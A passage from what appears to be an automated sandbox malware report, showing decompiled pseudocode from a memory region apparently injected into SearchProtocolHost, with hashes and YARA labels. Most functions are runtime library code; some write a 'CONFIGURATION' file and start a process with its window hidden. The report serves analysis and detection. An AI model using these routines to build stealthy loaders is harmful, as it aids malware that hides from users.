				_t30 = __edx;
				_t16 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					return 0;
				} else {
					_t25 = CreateFileW(_a4, 0xc0000000, 0, 0, 2, 0, 0);
					if(_t25 != 0xffffffff) {
						_v8 = 0;
						_t10 = WriteFile(_t25, _t16, _t30,  &_v8, 0);
						CloseHandle(_t25);
						if((_t16 & 0xffffff00 | _t10 != 0x00000000) == 0 || _v8 != _t30) {
							return 0;
						} else {
							return 1;
						}
					} else {
						return 0;
					}
				}
			}








                                                0x02faa633
                                                0x02faa636
                                                0x02faa638
                                                0x02faa63c
                                                0x02faa6b2
                                                0x02faa642
                                                0x02faa65b
                                                0x02faa660
                                                0x02faa670
                                                0x02faa67b
                                                0x02faa687
                                                0x02faa68f
                                                0x02faa6aa
                                                0x02faa696
                                                0x02faa6a1
                                                0x02faa6a1
                                                0x02faa662
                                                0x02faa66a
                                                0x02faa66a
                                                0x02faa660

                                                APIs
                                                • CreateFileW.KERNEL32(02FAA81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A,?), ref: 02FAA655
                                                • WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA67B
                                                • CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA687
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: CONFIGURATION
                                                • API String ID: 1065093856-2209261362
                                                • Opcode ID: a99966a55119d9e28cc9b91d26b09067edf41ed67e83d8ae40069b3216467fba
                                                • Instruction ID: d3f3fafe143127e702941d427f4e26b2201ea0bf594e1f6deeb8ea5012387040
                                                • Opcode Fuzzy Hash: a99966a55119d9e28cc9b91d26b09067edf41ed67e83d8ae40069b3216467fba
                                                • Instruction Fuzzy Hash: D801F932BD121877EB30896EBD45BEAB3ACD782B75F6001A6FE08D7380D6615C145990
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4F50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E02FA4F50(CHAR* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4) {
				struct _STARTUPINFOA _v72;
				void* __edi;
				void* __esi;
				signed int _t17;
				CHAR* _t20;
				CHAR* _t23;
				void* _t24;
				struct _PROCESS_INFORMATION* _t25;
				void* _t28;

				_t28 = __eflags;
				_t23 = __edx;
				_t20 = __ecx;
				E02FB3440(__edx,  &_v72, 0, 0x44);
				_t25 = E02FB0A6E(_t24, _t28, 0x10);
				E02FB3440(_t23,  &_v72, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [esi], xmm0");
				GetStartupInfoA( &_v72);
				_v72.cb = 0x44;
				_v72.wShowWindow = 0;
				_v72.dwFlags = 1;
				_t17 = CreateProcessA(_t20, _t23, 0, 0, 0, 0x20, 0, _a4,  &_v72, _t25);
				asm("sbb eax, eax");
				return  ~_t17 & _t25;
			}












                                                0x02fa4f50
                                                0x02fa4f5e
                                                0x02fa4f63
                                                0x02fa4f65
                                                0x02fa4f73
                                                0x02fa4f7b
                                                0x02fa4f86
                                                0x02fa4f89
                                                0x02fa4f8d
                                                0x02fa4f96
                                                0x02fa4f9d
                                                0x02fa4fa8
                                                0x02fa4fbb
                                                0x02fa4fc4
                                                0x02fa4fcd

                                                APIs
                                                • new.LIBCMT ref: 02FA4F6C
                                                • GetStartupInfoA.KERNEL32(?), ref: 02FA4F8D
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,02FA985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 02FA4FBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: D
                                                • API String ID: 525363069-2746444292
                                                • Opcode ID: ba47b3342c2f1139755ff6fbaf244471043241d33ab135e19253e8a18aa736a2
                                                • Instruction ID: 0bb99f9f1fd1a0c8218771b0f8c2dfa0aaa9ce7a74f9cc81bd5efabe91379468
                                                • Opcode Fuzzy Hash: ba47b3342c2f1139755ff6fbaf244471043241d33ab135e19253e8a18aa736a2
                                                • Instruction Fuzzy Hash: BA01D471E8030C76EB20DAA08D46FDEB7ACDF44B50F600525B708FA1C0E6B4BA508798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB932B Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E02FB932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E02FB4970(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E02FC3C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E02FC3C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E02FB3440(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E02FC3C50( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E02FC3B70();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E02FC3B70();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E02FC3B70();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E02FB962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E02FC4330(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E02FB5D43();
					_t183 = 0x22;
					 *_t129 = _t183;
					E02FB5C10();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                0x02fb932b
                                                0x02fb9336
                                                0x02fb933d
                                                0x02fb933f
                                                0x02fb933f
                                                0x02fb9341
                                                0x02fb934a
                                                0x02fb934c
                                                0x02fb9351
                                                0x02fb9357
                                                0x02fb936d
                                                0x02fb9372
                                                0x02fb9375
                                                0x02fb9382
                                                0x02fb9387
                                                0x02fb93db
                                                0x02fb93e3
                                                0x02fb93e5
                                                0x02fb93e7
                                                0x02fb93ea
                                                0x02fb93ea
                                                0x02fb93ea
                                                0x02fb93f0
                                                0x02fb93f8
                                                0x02fb940b
                                                0x02fb940e
                                                0x02fb9410
                                                0x02fb9413
                                                0x02fb9414
                                                0x02fb9435
                                                0x02fb9438
                                                0x02fb9438
                                                0x02fb9416
                                                0x02fb9416
                                                0x02fb9418
                                                0x02fb9423
                                                0x02fb9423
                                                0x02fb9425
                                                0x02fb942c
                                                0x02fb9427
                                                0x02fb9427
                                                0x02fb9427
                                                0x02fb9425
                                                0x02fb9439
                                                0x02fb943b
                                                0x02fb943c
                                                0x02fb943f
                                                0x02fb9441
                                                0x02fb944b
                                                0x02fb9455
                                                0x02fb9443
                                                0x02fb9443
                                                0x02fb9443
                                                0x02fb945a
                                                0x02fb945a
                                                0x02fb945f
                                                0x02fb9462
                                                0x02fb946d
                                                0x02fb946d
                                                0x02fb946d
                                                0x02fb946d
                                                0x02fb9471
                                                0x02fb9478
                                                0x02fb9479
                                                0x02fb947c
                                                0x02fb947f
                                                0x02fb947f
                                                0x02fb9481
                                                0x00000000
                                                0x00000000
                                                0x02fb9499
                                                0x02fb94a0
                                                0x02fb94a4
                                                0x02fb94a7
                                                0x02fb94aa
                                                0x02fb94ac
                                                0x02fb94ac
                                                0x02fb94ac
                                                0x02fb94ae
                                                0x02fb94b1
                                                0x02fb94b4
                                                0x02fb94b6
                                                0x02fb94be
                                                0x02fb94c4
                                                0x02fb94c7
                                                0x02fb94ca
                                                0x02fb94cb
                                                0x02fb94ce
                                                0x02fb94d1
                                                0x02fb94d1
                                                0x02fb94d6
                                                0x02fb94d9
                                                0x00000000
                                                0x00000000
                                                0x02fb94f1
                                                0x02fb94f6
                                                0x02fb94fa
                                                0x00000000
                                                0x00000000
                                                0x02fb94fe
                                                0x02fb9501
                                                0x02fb9502
                                                0x02fb9502
                                                0x02fb9504
                                                0x02fb9507
                                                0x00000000
                                                0x00000000
                                                0x02fb9509
                                                0x02fb950c
                                                0x02fb9513
                                                0x02fb9516
                                                0x02fb9519
                                                0x02fb952f
                                                0x02fb952f
                                                0x02fb952f
                                                0x02fb951b
                                                0x02fb951b
                                                0x02fb951d
                                                0x02fb9520
                                                0x02fb952b
                                                0x02fb9522
                                                0x02fb9525
                                                0x02fb9525
                                                0x02fb9520
                                                0x00000000
                                                0x02fb9519
                                                0x02fb950e
                                                0x02fb950e
                                                0x02fb9510
                                                0x02fb9510
                                                0x02fb9464
                                                0x02fb9464
                                                0x02fb9467
                                                0x02fb9532
                                                0x02fb9532
                                                0x02fb9534
                                                0x02fb9536
                                                0x02fb9539
                                                0x02fb953a
                                                0x02fb953b
                                                0x02fb953c
                                                0x02fb9544
                                                0x02fb9544
                                                0x02fb9544
                                                0x02fb9546
                                                0x02fb9549
                                                0x02fb954c
                                                0x02fb954e
                                                0x02fb954e
                                                0x02fb9550
                                                0x02fb9562
                                                0x02fb9566
                                                0x02fb9569
                                                0x02fb9570
                                                0x02fb9578
                                                0x02fb9578
                                                0x02fb957b
                                                0x02fb957d
                                                0x02fb958e
                                                0x02fb958e
                                                0x02fb9592
                                                0x02fb9592
                                                0x02fb9595
                                                0x02fb9597
                                                0x02fb959a
                                                0x00000000
                                                0x02fb957f
                                                0x02fb957f
                                                0x02fb9585
                                                0x02fb9585
                                                0x02fb9589
                                                0x02fb959c
                                                0x02fb959c
                                                0x02fb95a0
                                                0x02fb95a1
                                                0x02fb95a3
                                                0x02fb95a5
                                                0x02fb95e6
                                                0x02fb95e6
                                                0x02fb95e8
                                                0x02fb95f5
                                                0x02fb95f5
                                                0x02fb95f7
                                                0x02fb95f9
                                                0x02fb95fa
                                                0x02fb95fb
                                                0x02fb9602
                                                0x02fb9605
                                                0x02fb9607
                                                0x02fb9607
                                                0x02fb9608
                                                0x02fb960a
                                                0x02fb960d
                                                0x02fb960d
                                                0x02fb960f
                                                0x02fb9611
                                                0x00000000
                                                0x02fb9611
                                                0x02fb95ea
                                                0x02fb95ec
                                                0x00000000
                                                0x00000000
                                                0x02fb95ee
                                                0x00000000
                                                0x00000000
                                                0x02fb95f0
                                                0x02fb95f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb95f3
                                                0x02fb95ac
                                                0x02fb95b2
                                                0x02fb95b2
                                                0x02fb95b4
                                                0x02fb95b5
                                                0x02fb95b6
                                                0x02fb95b7
                                                0x02fb95be
                                                0x02fb95c1
                                                0x02fb95c3
                                                0x02fb95c4
                                                0x02fb95c6
                                                0x02fb95d3
                                                0x02fb95d3
                                                0x02fb95d5
                                                0x02fb95d7
                                                0x02fb95d8
                                                0x02fb95d9
                                                0x02fb95e0
                                                0x02fb95e3
                                                0x02fb95e5
                                                0x02fb95e5
                                                0x00000000
                                                0x02fb95e5
                                                0x02fb95c8
                                                0x02fb95c8
                                                0x02fb95ca
                                                0x00000000
                                                0x00000000
                                                0x02fb95cc
                                                0x00000000
                                                0x00000000
                                                0x02fb95ce
                                                0x02fb95d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb95d1
                                                0x02fb95ae
                                                0x02fb95b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb95b0
                                                0x02fb9581
                                                0x02fb9583
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb9583
                                                0x02fb957d
                                                0x00000000
                                                0x02fb9467
                                                0x02fb9462
                                                0x02fb9389
                                                0x02fb938b
                                                0x00000000
                                                0x02fb938d
                                                0x02fb93a3
                                                0x02fb93a8
                                                0x02fb93aa
                                                0x02fb93b6
                                                0x02fb93bc
                                                0x02fb93bd
                                                0x02fb93bf
                                                0x02fb93c1
                                                0x02fb93cc
                                                0x02fb93cc
                                                0x02fb93cf
                                                0x02fb93d1
                                                0x02fb93d1
                                                0x02fb93d4
                                                0x02fb93ac
                                                0x02fb93ac
                                                0x02fb93ac
                                                0x00000000
                                                0x02fb93aa
                                                0x02fb9359
                                                0x02fb9359
                                                0x02fb9360
                                                0x02fb9361
                                                0x02fb9363
                                                0x02fb9615
                                                0x02fb9619
                                                0x02fb961e
                                                0x02fb961e
                                                0x02fb962d
                                                0x02fb962d

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: 90e57279b114d9fa0e4bc3772ae086b42b19a11bc2e45c99e85dad90eb69a4e3
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: C4A14672E446869FD7238F2AC8907EABBE5EF15394F1841ADD7859B381C3B48941CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA6100 Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E02FA6100(unsigned int __ecx, unsigned int __edx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				unsigned int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t34;
				signed int _t37;
				void* _t40;
				intOrPtr _t42;
				signed int _t44;
				intOrPtr _t45;
				signed int _t50;
				signed int _t54;
				unsigned int _t58;
				signed int _t59;
				signed int _t66;
				signed int _t72;
				signed int _t75;
				signed int _t80;
				intOrPtr _t81;

				_t68 = __edx;
				_t62 = __ecx;
				_push(0xffffffff);
				_push(E02FC45D0);
				_push( *[fs:0x0]);
				_t81 = _t80 - 0xc;
				_push(_t58);
				_t34 =  *0x2fcf008; // 0x93ad1eea
				_push(_t34 ^ _t80);
				 *[fs:0x0] =  &_v16;
				_v20 = _t81;
				_t75 = __ecx;
				_v24 = __ecx;
				_t37 = _a4;
				_t72 = _t37 | 0x0000000f;
				if(_t72 <= 0xfffffffe) {
					_t58 =  *(__ecx + 0x14);
					_t62 = _t58 >> 1;
					_t68 = 0xaaaaaaab * _t72 >> 0x20 >> 1;
					__eflags = _t62 - 0xaaaaaaab * _t72 >> 0x20 >> 1;
					if(_t62 > 0xaaaaaaab * _t72 >> 0x20 >> 1) {
						_t72 = _t62 + _t58;
						__eflags = _t58 - 0xfffffffe - _t62;
						if(_t58 > 0xfffffffe - _t62) {
							_t72 = 0xfffffffe;
						}
					}
				} else {
					_t72 = _t37;
				}
				_t11 = _t72 + 1; // 0xffffffff
				_t40 = _t11;
				_v8 = 0;
				if(_t40 != 0) {
					__eflags = _t40 - 0xffffffff;
					if(__eflags > 0) {
						_t40 = E02FB1283(__eflags);
					}
					__eflags = _t40 - 0x1000;
					if(__eflags < 0) {
						_t59 = E02FB0A6E(_t75, __eflags, _t40);
						_t81 = _t81 + 4;
						__eflags = _t59;
						if(__eflags != 0) {
							goto L17;
						} else {
							E02FB5C20(_t59, _t62, _t68, _t72, __eflags);
							_t50 = _a4;
							_a4 = _t50;
							__eflags = _t50 + 1;
							_v20 = _t81;
							_v8 = 2;
							_v28 = E02FA6440(_t59, _t68, _t72, _t75, _t50 + 1);
							return E02FA61E5;
						}
					} else {
						_t13 = _t40 + 0x23; // 0x23
						_t67 = _t13;
						__eflags = _t13 - _t40;
						if(__eflags <= 0) {
							E02FB1283(__eflags);
						}
						_t54 = E02FB0A6E(_t75, __eflags, _t67);
						_t81 = _t81 + 4;
						__eflags = _t54;
						if(__eflags == 0) {
							_t54 = E02FB5C20(_t58, _t67, _t68, _t72, __eflags);
						}
						_t14 = _t54 + 0x23; // 0x23
						_t59 = _t14 & 0xffffffe0;
						 *(_t59 - 4) = _t54;
						goto L17;
					}
				} else {
					_t59 = 0;
					L17:
					_t42 = _a8;
					if(_t42 != 0) {
						if( *(_t75 + 0x14) < 0x10) {
							_t66 = _t75;
						} else {
							_t66 =  *_t75;
						}
						if(_t42 != 0) {
							E02FC3DB0(_t59, _t66, _t42);
						}
					}
					_t43 =  *(_t75 + 0x14);
					if( *(_t75 + 0x14) >= 0x10) {
						E02FA5CF0(_t59, _t68, _t72,  *_t75, _t43 + 1);
					}
					 *(_t75 + 0x14) = 0xf;
					 *((intOrPtr*)(_t75 + 0x10)) = 0;
					if( *(_t75 + 0x14) < 0x10) {
						_t44 = _t75;
					} else {
						_t44 =  *_t75;
					}
					 *_t44 = 0;
					_t45 = _a8;
					 *_t75 = _t59;
					 *(_t75 + 0x14) = _t72;
					 *((intOrPtr*)(_t75 + 0x10)) = _t45;
					if( *(_t75 + 0x14) >= 0x10) {
						_t75 = _t59;
					}
					 *((char*)(_t75 + _t45)) = 0;
					 *[fs:0x0] = _v16;
					return _t45;
				}
			}



























                                                0x02fa6100
                                                0x02fa6100
                                                0x02fa6103
                                                0x02fa6105
                                                0x02fa6110
                                                0x02fa6111
                                                0x02fa6114
                                                0x02fa6117
                                                0x02fa611e
                                                0x02fa6122
                                                0x02fa6128
                                                0x02fa612b
                                                0x02fa612d
                                                0x02fa6130
                                                0x02fa6135
                                                0x02fa613b
                                                0x02fa6141
                                                0x02fa614d
                                                0x02fa614f
                                                0x02fa6151
                                                0x02fa6153
                                                0x02fa615a
                                                0x02fa615f
                                                0x02fa6161
                                                0x02fa6163
                                                0x02fa6163
                                                0x02fa6161
                                                0x02fa613d
                                                0x02fa613d
                                                0x02fa613d
                                                0x02fa6168
                                                0x02fa6168
                                                0x02fa616b
                                                0x02fa6174
                                                0x02fa617a
                                                0x02fa617d
                                                0x02fa617f
                                                0x02fa617f
                                                0x02fa6184
                                                0x02fa6189
                                                0x02fa61ba
                                                0x02fa61bc
                                                0x02fa61bf
                                                0x02fa61c1
                                                0x00000000
                                                0x02fa61c3
                                                0x02fa61c3
                                                0x02fa61c8
                                                0x02fa61cb
                                                0x02fa61ce
                                                0x02fa61cf
                                                0x02fa61d3
                                                0x02fa61dc
                                                0x02fa61e4
                                                0x02fa61e4
                                                0x02fa618b
                                                0x02fa618b
                                                0x02fa618b
                                                0x02fa618e
                                                0x02fa6190
                                                0x02fa6192
                                                0x02fa6192
                                                0x02fa6198
                                                0x02fa619d
                                                0x02fa61a0
                                                0x02fa61a2
                                                0x02fa61a4
                                                0x02fa61a4
                                                0x02fa61a9
                                                0x02fa61ac
                                                0x02fa61af
                                                0x00000000
                                                0x02fa61af
                                                0x02fa6176
                                                0x02fa6176
                                                0x02fa61ee
                                                0x02fa61ee
                                                0x02fa61f3
                                                0x02fa61f9
                                                0x02fa61ff
                                                0x02fa61fb
                                                0x02fa61fb
                                                0x02fa61fb
                                                0x02fa6203
                                                0x02fa6208
                                                0x02fa620d
                                                0x02fa6203
                                                0x02fa6210
                                                0x02fa6216
                                                0x02fa621c
                                                0x02fa621c
                                                0x02fa6221
                                                0x02fa6228
                                                0x02fa6233
                                                0x02fa6239
                                                0x02fa6235
                                                0x02fa6235
                                                0x02fa6235
                                                0x02fa623b
                                                0x02fa623e
                                                0x02fa6241
                                                0x02fa6243
                                                0x02fa6246
                                                0x02fa624d
                                                0x02fa624f
                                                0x02fa624f
                                                0x02fa6251
                                                0x02fa6258
                                                0x02fa6266
                                                0x02fa6266

                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 02FA617F
                                                  • Part of subcall function 02FB1283: __CxxThrowException@8.LIBVCRUNTIME ref: 02FB129A
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 02FA6192
                                                • new.LIBCMT ref: 02FA6198
                                                • new.LIBCMT ref: 02FA61B5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID:
                                                • API String ID: 3339364867-0
                                                • Opcode ID: a5f2f5cf07e4563e0c3dd88c99b351e6cbab617497ca0b8228092bd08521ea5b
                                                • Instruction ID: f8badaffada95ba0e4535a72870f15eee6180488b021565784b06390c0766fc3
                                                • Opcode Fuzzy Hash: a5f2f5cf07e4563e0c3dd88c99b351e6cbab617497ca0b8228092bd08521ea5b
                                                • Instruction Fuzzy Hash: 5E41E4F1E002009BEF20DF68C95076ABBEDEF05B94F540A2DEA22C7281D771D904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB917C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E02FB917C(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x2fd0558; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E02FB78D0(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E02FB7F1D(_t13, __eflags,  *0x2fd0558, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E02FB8F6A(_t13, _t15, 0x2fd6690);
							E02FB7848(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
